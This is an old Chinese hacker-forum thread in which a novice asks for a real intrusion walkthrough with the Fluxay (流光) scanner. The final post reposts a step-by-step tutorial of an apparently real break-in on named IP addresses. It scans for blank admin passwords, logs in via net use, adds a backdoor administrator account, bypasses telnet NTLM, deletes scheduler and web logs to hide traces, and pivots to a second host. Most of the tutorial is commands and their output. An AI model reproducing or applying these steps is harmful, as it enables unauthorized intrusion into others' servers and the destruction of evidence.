黑色海岸线论坛 - Powered by Discuz! Board

标题: [原创]能写出个流光的具体入侵过程吗?? [打印本页]

作者: edxz 时间: 2003-6-16 21:04 标题: [原创]能写出个流光的具体入侵过程吗??

我是菜鸟,对一些技术性的东西理解不了,不知道能否写个流光的入侵过程!最好是真实的!让我们好好学学!!感激!感谢!!!!!

作者: 默读忧伤 时间: 2003-6-16 21:10 标题: [原创]能写出个流光的具体入侵过程吗??

这种教材好像到处都有啊.你可以搜索一下.还有,我好像记得流光本身就附带一个简单的教程.可惜我现在的操作系统是XP.好像有点问题(是你的技术有问题吧!).要不我可以发一个.或者你可以等我装回2000?哎~还是不要等了,搜索!推荐:www.google.com

作者: hus928 时间: 2003-6-17 09:33 标题: [原创]能写出个流光的具体入侵过程吗??

流光的使用方法可以说是傻瓜行的
你只需要配置点IP就可以了
具体的教程我这里有一本，可是发不上来啊
抱歉。

你最好还是用google去搜索吧，还有baidu的也可以

作者: edxz 时间: 2003-6-17 21:04 标题: [原创]能写出个流光的具体入侵过程吗??

谢谢1!!

作者: 黑色叶子 时间: 2003-6-19 16:30 标题: [原创]能写出个流光的具体入侵过程吗??

netsfan.net的killer做过流光终结教程，

作者: 中国流氓狗 时间: 2003-6-19 17:03 标题: [原创]能写出个流光的具体入侵过程吗??

：） 3楼说的只说最简单最常用的
流光有好多强大的功能，自己慢慢磨吧

作者: hus928 时间: 2003-6-19 17:05 标题: [原创]能写出个流光的具体入侵过程吗??

我所说的就是这个，一个小册子。
里面介绍的非常详细
我是买《黑客X档案》2002年8月。附送的

作者: 網纙knight 时间: 2003-6-21 07:41 标题: [原创]能写出个流光的具体入侵过程吗??

我也想看啊，在哪买的啊？

作者: hus928 时间: 2003-6-21 09:46 标题: [原创]能写出个流光的具体入侵过程吗??

那你找《黑客X档案》的出版社联系吧

作者: 风灵风之子 时间: 2003-6-21 11:21 标题: [原创]能写出个流光的具体入侵过程吗??

楼主:
可以联系我
我这里有一本killer写的流光的教程

作者: 李锋 时间: 2003-6-24 21:56 标题: [原创]能写出个流光的具体入侵过程吗??

http://1123.myrice.com/jiao9/j1115.htm
到这来看看！

作者: 虫舞九天 时间: 2003-8-28 03:36 标题: [原创]能写出个流光的具体入侵过程吗??

黑客零起点实战篇手把手教你用“流光” 作者：冰影（原创）完成于：2001.07.19 01：30 编者小飞刀：这是为“黑客零起点”所写的教程，配备详尽的图解，可谓是“手把手”的，网上还没比这更详尽有关”流光的教材，因此特别适合初手学习。正是此文配备大量图解，体积过太，压缩后还有400KB，相当一本有上百篇文章的“黑客零起点”零号版网络手册大小。为保持网络手册的精悍，实用，短小的风格，暂不录入，有待冰影将其简化精华后再收录入手册。但此类配备图解文章对初手是很好的教材，所以先独立成册发放。正文：最近很忙！知道小刀要写电子杂志！！所以抽时间写一点东西！我也只是一个小人物！！所知甚少！首先使用榕哥的流光IV,对于初学者来说这实在是一个很好的软件！你不需要知道太多！我们用流光IV来扫描一段网址！点击探测－高级扫描工具！（图1）输入ip地址范围！（图2）起始地址/结束地址：需要扫描的IP地址范围。目标系统：ALL-所有系统 NT-NT／2000系统 UNIX-UNIX系统，根据选择的不同下面的［检测项目］将会有不同设置。获取主机名：获取主机的名称。检测项目：选择需要扫描的项目，根据选择的不同表单会有所不同。　（图3）如图3所示你可以自己定义你的用户字典和密码字典。猜解用户名字典：设置扫描中采用的用户字典，适用于POP3/FTP/IMAP/SQL/MYSQL。猜解密码字典：设置扫描中采用的密码字典，适用于POP3/FTP/IMAP/SQL/MYSQL。保存扫描报告：扫描的报告，采用HTML格式。并发线程数目：默认80，可以根据情况增减，如果线程数目越大速度越快但是越容易误报和漏报。网络选项：设置TCP参数大概需要20分钟左右扫描结束！太多就不贴了！总之我们得到了两个admin的帐号！mf和lyl密码都是空！我们点击开始运行－输入cmd单击确定我们在命令提示符下使用net use命令远程连接主机210.192.111.207 如下所示：这里断口78是冰影自己改的！默认端口是99 如下所示：我们已经成功登陆到主机210.192.111.207，权限是system 这个时候很多人都会文我该坐什么呢！我们首先在名利提示符下输入： net name 显示那台主机的名字在输入：ipconfig 看看他的网络配置，有两块网卡一个是内部：192.168.1.4 一个是外部的：210.192.111.207 输入：ver 对方主机显示： C:\WINNT\system32>ver Microsoft Windows 2000 [Version 5.00.2195] C:\WINNT\system32> C:\WINNT\system32>net start 已经启动以下 Windows 2000 服务: Alerter Application Management COM+ Event System Computer Browser DHCP Client Distributed File System Distributed Link Tracking Client Distributed Link Tracking Server Distributed Transaction Coordinator DNS Client Event Log File Replication Service FTP Publishing Service IIS Admin Service Indexing Service Intersite Messaging IPSEC Policy Agent Kerberos Key Distribution Center Logical Disk Manager Messenger Microsoft Search Microsoft SMTP Service MSSQLServer Net Logon Network Connections NT LM Security Support Provider Plug and Play Print Spooler Protected Storage Remote Procedure Call (RPC) Remote Procedure Call (RPC) Locator Remote Registry Service Removable Storage RunAs Service Security Accounts Manager Server SQLServerAgent System Event Notification Task Scheduler TCP/IP NetBIOS Helper Service Windows Management Instrumentation Driver Extensions Windows Time Workstation World Wide Web Publishing Service 许可协议登录服务命令成功完成。 C:\WINNT\system32> C:\WINNT\system32>net start telnet Telnet 服务正在启动 . Telnet 服务已经启动成功。 C:\WINNT\system32> C:\WINNT\system32> C:\WINNT\system32> C:\WINNT\system32>net user 哈哈！有很多用户我们刚才已经启动telnet服务，现在只要增加一个用户，或者更改一个用户的密码，冰影建议你还是增加一个用户因为如果修改别人的密码会引起怀疑！ C:\WINNT\system32> C:\WINNT\system32>net user kk kk /add 命令成功完成。 C:\WINNT\system32> C:\WINNT\system32>net localgroup administrators kk /add 命令成功完成。 C:\WINNT\system32> C:\WINNT\system32> 现在可以了！！我们在打开一个命令提示符窗口输入：telnet 210.192.111.207 显示： NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password Server allows NTLM authentication only Server has closed connection 遗失对主机的连接。 C:\> 我们忘记了一件事！哈哈！在小榕的流光IV目录下的tools目录下有一个ntlm.exe的文件我已经把它copy到我得D:\> 文件成功更改！！ NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password Server allows NTLM authentication only Server has closed connection 遗失对主机的连接。 C:\> 还是同样的提示,没有成功！我们把telnet服务停止，然后在重新启动. 我们在试一试！终于ok了！我们输入刚才建立的用户名：kk 密码：kk 显示：这个时候可能会有朋友问我！冰影为什么你还不去黑了他的主页！冰影的目的不是这个！接着往下看吧！有一个tlntadmn的命令你们知道是作什么的吗（有一点熬不住了！！冲杯咖啡！！）我们选择：1 有没有看到如果对方主机上有人运行了这个程序（telnet服务器管理器）。你的ip地址和你所使用的用户名就被他看到了！选择3可以更改telnet断口，默认的是23，如果是我得电脑我会把它更改成自己喜欢的数字！请在下列选项中选择一个: telnet 210.192.111.207窗口显示： 0) 退出这个应用程序 1) 列出当前用户 2) 结束一个用户的会话 ... 3) 显示 / 更改注册表设置 ... 4) 开始服务 5) 停止服务请键入一个选项的号码 [0 - 5] 以选择该选项: 3 请在下列选项中选择一个: 0) 退出这个菜单 1) AllowTrustedDomain 2) AltKeyMapping 3) DefaultDomain 4) DefaultShell 5] 以选择该选项: 5) LoginScript 6) MaxFailedLogins 7) NTLM 8) TelnetPort 请键入一个选项的号码 [0 - 8] 以选择该选项: 7 0) 退出这个菜单Domain 1) AllowTrustedDomain 5) LoginScript 6) MaxFailedLogins 7) NTLM 8) TelnetPort 请键入一个选项的号码 [0 - 8] 以选择该选项: 8 TelnetPort 的当前值 = 23 您确实想更改这个值吗 ? [y/n]y TelnetPort [ 当前值 = 23; ] :99 您确实想将 TelnetPort 设置为 : 99 ? [y/n]y 只有当 Telnet 服务重新开始后设置才会生效请在下列选项中选择一个: 0) 退出这个菜单 1) AllowTrustedDomain 2) AltKeyMapping 3) DefaultDomain 5] 以选择该选项: 4) DefaultShell 5) LoginScript 6) MaxFailedLogins 7) NTLM 8) TelnetPort 请键入一个选项的号码 [0 - 8] 以选择该选项: 7 NTLM 的当前值 = 1 您确实想更改这个值吗 ? [y/n] ntlm的默认值是2我们刚才copy的ntlm并在他的主机运行已经改过了。 C:\>dir 驱动器 C 中的卷是 System 卷的序列号是 9CD1-C09D C:\ 的目录 2000-06-16 03:16p 524,288 a.evt 2000-04-13 01:34p 578 APInstall.log 2000-12-11 03:41p 12 calljia.txt 2000-09-15 02:45p 510 cn.data 2000-09-15 02:35p 525 eastsupplier.dat 2000-05-17 02:02p EVENTLOG 2000-04-11 05:46p 13,126 mpssetup.log 2000-08-18 09:57a 7,874 mssql.reg 2000-08-18 10:11a 17,115 mssql1.reg 2000-09-15 03:04p 2,965 named.boot 2000-09-15 02:36p 1,311 named.data 2001-03-06 02:21p PAVLN 2000-04-13 01:45p Perl 2000-08-26 04:04p php3 2001-03-19 03:02p Program Files 2001-05-10 12:00p 23,040 secwiper.exe 2000-09-15 02:13p 544 shfiec.data 2001-07-18 04:31p TEMP 2000-09-15 03:14p 1,265 trade.data 2001-07-02 09:48a WINNT 2000-09-15 02:15p 545 复件 cn.data 14 个文件 593,698 字节 7 个目录 175,907,840 可用字节 C:\> D:\>dir 驱动器 D 中的卷是 Database 卷的序列号是 C08D-17AD D:\ 的目录 2001-02-21 02:39p MSSQL7 2001-03-02 11:08a WinRoute Pro 0 个文件 0 字节 2 个目录 159,850,496 可用字节 D:\>C:\>d: D:\> D:\>dir 驱动器 D 中的卷是 Database 卷的序列号是 C08D-17AD D:\ 的目录 2001-02-21 02:39p MSSQL7 2001-03-02 11:08a WinRoute Pro 0 个文件 0 字节 2 个目录 159,850,496 可用字节 D:\> D:\>e: E:\> E:\>dir 驱动器 E 中的卷是 Www 卷的序列号是 9877-CDFE E:\ 的目录 2001-07-12 01:10p database 2001-06-01 08:36a DNS 2001-06-28 08:38a epserver 2000-04-21 04:01p ftp 2001-06-08 11:07a huajiaohui 2000-04-11 05:26p Inetpub 2000-04-11 05:46p msp 2000-04-11 05:25p Program Files 2001-06-27 04:56p recover 0 个文件 0 字节 9 个目录 1,212,620,800 可用字节 E:\> E:\>f: F:\> F:\>dir 驱动器 F 中的卷是 Internal Data 卷的序列号是 247A-2ABC F:\ 的目录 2001-06-25 12:18p EPServer 2001-06-26 09:34a KIT EP Server 1.0 0 个文件 0 字节 2 个目录 1,822,499,328 可用字节 F:\> F:\>g: G:\> G:\>dir 驱动器 G 中的卷是 Install files 卷的序列号是 C880-BB67 G:\ 的目录 1999-10-22 10:10a Logs 2001-03-01 12:08p ntinstall 2001-05-14 08:38a SetupFiles 1999-09-20 05:37p SQL SERVER 7.0 2000-09-20 12:00p SQLBackup 2000-03-21 03:13p urlcache 2000-03-21 01:10p VCD 0 个文件 0 字节 7 个目录 409,600 可用字节 G:\> 竟然有C、D、E、F、G五个盘符，我们看到了在E盘下有一个inetpub的目录，我们进去看看 E:\Inetpub>dir 驱动器 E 中的卷是 Www 卷的序列号是 9877-CDFE E:\Inetpub 的目录 2000-04-11 05:26p . 2000-04-11 05:26p .. 2001-03-02 09:58a Catalog.wci 2000-04-10 03:52p ftproot 2000-04-11 05:21p iissamples 2000-04-07 04:31p Mail 2000-04-07 04:35p Mailroot 2000-04-07 04:30p News 2000-04-11 05:11p nntpfile 2000-04-11 05:45p scripts 2001-06-28 08:12a wwwroot 0 个文件 0 字节 11 个目录 1,212,616,704 可用字节 E:\Inetpub> E:\Inetpub> 到这个时候你想坐什么是不是黑了他就会很是痛快！虽然他是台湾的！冰影对黑主页没有兴趣！前几天有一个有一台有漏洞的主机关掉了！刚才用这台肉鸡ping了一下，可以ping通！（等一下我们在去连接这台主机）现在我们要做好清除日志的准备！ Windows2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等，可能会根据服务器所开启的服务不同。应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%\system32\config，默认文件大小512KB，管理员都会改变这个默认大小。安全日志文件：%systemroot%\system32\config\SecEvent.EVT 系统日志文件：%systemroot%\system32\config\SysEvent.EVT 应用程序日志文件：%systemroot%\system32\config\AppEvent.EVT Internet信息服务FTP日志默认位置：%systemroot%\system32\logfiles\msftpsvc1\，默认每天一个日志 Internet信息服务WWW日志默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志 Scheduler服务日志默认位置：%systemroot%\schedlgu.txt 以上日志在注册表里的键：应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的： HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog 有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。 Schedluler服务日志在注册表中 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent FTP和WWW日志详解： FTP日志和WWW日志默认情况，每天生成一个日志文件，包含了该日的一切记录，文件名通常为ex（年份）（月份）（日期），例如ex001023，就是2000年10月23日产生的日志，用记事本就可直接打开。有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。既使你删掉FTP和WWW日志，但是还是会在系统日志和安全日志里记录下来，但是较好的是只显示了你的机器名，并没有你的IP，下面我们就来看看如何删除日志？打开你自己电脑的事件查看器点击连接到另外一台计算机单击确定可能会很慢！这样我们就可以删除事件了！一定要有耐心！可能会很慢！有时间就一个一个看然后删除！删除SchedLgU.Txt C:\WINNT> C:\WINNT>net stop "task scheduler" Task Scheduler 服务正在停止. Task Scheduler 服务已成功停止。 C:\WINNT> C:\WINNT>del schedlgu.txt C:\WINNT> C:\WINNT> 成功删除（冰影做了一个备份，冰影不习惯删除，我要替换他，我在copy上去一个避免聪明的管理员使用recover回复以删除的文件 database for the task indicated. "Task Scheduler Service" Exited at 5/16/01 3:05:30 PM "Task Scheduler Service" Started at 5/16/01 3:09:42 PM "Task Scheduler Service" Exited at 5/18/01 11:23:22 PM "Task Scheduler Service" Started at 5/18/01 11:27:20 PM "Task Scheduler Service" Exited at 5/19/01 6:14:42 PM "Task Scheduler Service" Started at 5/19/01 6:18:42 PM "Task Scheduler Service" Started at 6/4/01 10:51:12 AM "At1.job" (srv.exe) Started 6/10/01 1:49:00 PM "At1.job" (srv.exe) Finished 6/10/01 1:50:00 PM Result: The task completed with an exit code of (0). "At1.job" (winshell.exe) Started 6/14/01 7:08:00 PM "Task Scheduler Service" Started at 6/15/01 2:51:00 PM "At1.job" (srv.exe) Started 6/17/01 2:47:00 PM "At1.job" (srv.exe) Finished 6/17/01 3:19:10 PM Result: The task completed with an exit code of (0). "At1.job" (srv.exe) Started 6/17/01 3:47:00 PM "At1.job" (srv.exe) Finished 6/17/01 3:50:19 PM Result: The task completed with an exit code of (0). "At1.job" (srv.exe) Started 6/17/01 3:56:00 PM "At1.job" (srv.exe) Finished 6/17/01 3:56:54 PM Result: The task completed with an exit code of (0). "At1.job" (srv.exe) Started 6/17/01 4:09:00 PM "At1.job" (srv.exe) Finished 6/17/01 4:13:19 PM Result: The task completed with an exit code of (0). "At1.job" (FsSniffer.exe) Started 6/25/01 4:14:00 PM "At1.job" (FsSniffer.exe) Finished 6/25/01 4:14:15 PM Result: The task completed with an exit code of (0). "At2.job" (SRV.EXE) Started 6/25/01 4:15:00 PM "At3.job" (RunAsEx.exe) Started 6/25/01 4:15:00 PM "At3.job" (RunAsEx.exe) Finished 6/25/01 4:15:02 PM Result: The task completed with an exit code of (0). "At4.job" (Slave.exe) Started 6/25/01 4:50:00 PM "At4.job" (Slave.exe) Finished 6/25/01 4:50:24 PM Result: The task completed with an exit code of (0). "At2.job" (SRV.EXE) Finished 6/25/01 4:56:45 PM Result: The task completed with an exit code of (ffffffff). "Task Scheduler Service" Started at 6/27/01 7:09:20 PM "Task Scheduler Service" Started at 6/29/01 4:37:31 PM "Task Scheduler Service" Exited at 7/3/01 10:43:22 PM "Task Scheduler Service" Started at 7/3/01 10:47:34 PM "Task Scheduler Service" Exited at 7/7/01 12:19:10 AM "Task Scheduler Service" Started at 7/7/01 12:23:23 AM "Task Scheduler Service" Exited at 7/7/01 12:28:32 AM "Task Scheduler Service" Started at 7/7/01 12:32:45 AM "Task Scheduler Service" Exited at 7/7/01 5:52:01 PM "Task Scheduler Service" Started at 7/7/01 5:56:00 PM "Task Scheduler Service" Exited at 7/7/01 8:24:58 PM "Task Scheduler Service" Started at 7/7/01 8:29:14 PM "Task Scheduler Service" Exited at 7/7/01 9:09:29 PM "Task Scheduler Service" Started at 7/7/01 9:13:44 PM "Task Scheduler Service" Exited at 7/7/01 9:22:37 PM "Task Scheduler Service" Started at 7/7/01 9:26:53 PM "Task Scheduler Service" Exited at 7/7/01 9:44:09 PM "Task Scheduler Service" Started at 7/7/01 9:48:12 PM "Task Scheduler Service" Exited at 7/7/01 10:43:08 PM "Task Scheduler Service" Started at 7/7/01 10:47:10 PM "Task Scheduler Service" Exited at 7/11/01 4:43:06 PM "Task Scheduler Service" Started at 7/11/01 4:47:26 PM "Task Scheduler Service" Exited at 7/16/01 2:29:22 PM "Task Scheduler Service" Started at 7/16/01 2:33:28 PM "At1.job" (srv.exe) Started 7/18/01 5:55:00 PM "At2.job" (sys.exe) 这台主机不知道已经北多少人搞过了！竟然没有人删除日志！可能是因为是国外的所以没有关系！哈哈 C:\WINNT> C:\WINNT>net start "task scheduler" Task Scheduler 服务正在启动 . Task Scheduler 服务已经启动成功。 C:\WINNT> C:\WINNT> 下一个是FTP日志和WWW日志，原理都是一样，先停掉相关服务　全部删掉！可是还有一个无法删除停止www服务！然后在试一试！ C:\WINNT> C:\WINNT>net stop "World Wide Web Publishing Service" World Wide Web Publishing Service 服务正在停止.......... World Wide Web Publishing Service 服务已成功停止。 C:\WINNT> C:\WINNT>net stop "FTP Publishing Service" FTP Publishing Service 服务正在停止. FTP Publishing Service 服务已成功停止。 C:\WINNT> C:\WINNT>net stop "IIS Admin Service" 下面的服务依赖于 IIS Admin Service 服务。停止 IIS Admin Service 服务也会停止这些服务。 Microsoft SMTP Service 是否继续此操作? (Y/N) [N]: 没有提供有效的响应。 C:\WINNT> C:\WINNT>net stop "Microsoft SMTP Service" Microsoft SMTP Service 服务正在停止. Microsoft SMTP Service 服务已成功停止。 C:\WINNT> C:\WINNT>net stop "IIS Admin Service" ... IIS Admin Service 服务已成功停止。 C:\WINNT> C:\WINNT> 冰影停止了四个服务在把它删掉，真是徒劳！里面根本就没有我得ip！还有需要补充：可以启动他的“Remote Registry Service”允许远程注册表操作我们这里服务已经启动如果没有启动可以通过net start "Remote Registry Service"来启动显示：可操作他的注册表！嘻嘻！是不是很爽！！go on 我真是不敢相信！这台210.200.14.170的主机还是没有改掉administrator 的密码，123 冰影是要用210.192.111.207这台主机条到210.200.14.170主机上去等几分钟！.... 成功！210.192.111.207 的名字是DELLNT 而210.200.14.170的名字是win2000srv 还可以证明对话框上面写的是telnet 210.192.111.207 99 可是输入ipconfig，显示的ip地址是：210.200.14.170 哈哈成功用一个主机跳到另一个主机！你还可以跳跳跳！　今天就到这里！点击下载最新“黑客零起点”网络手册　出版组织：中华小刀会 CNKN. www.cnknife.org 版权所有　站长：小飞刀

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)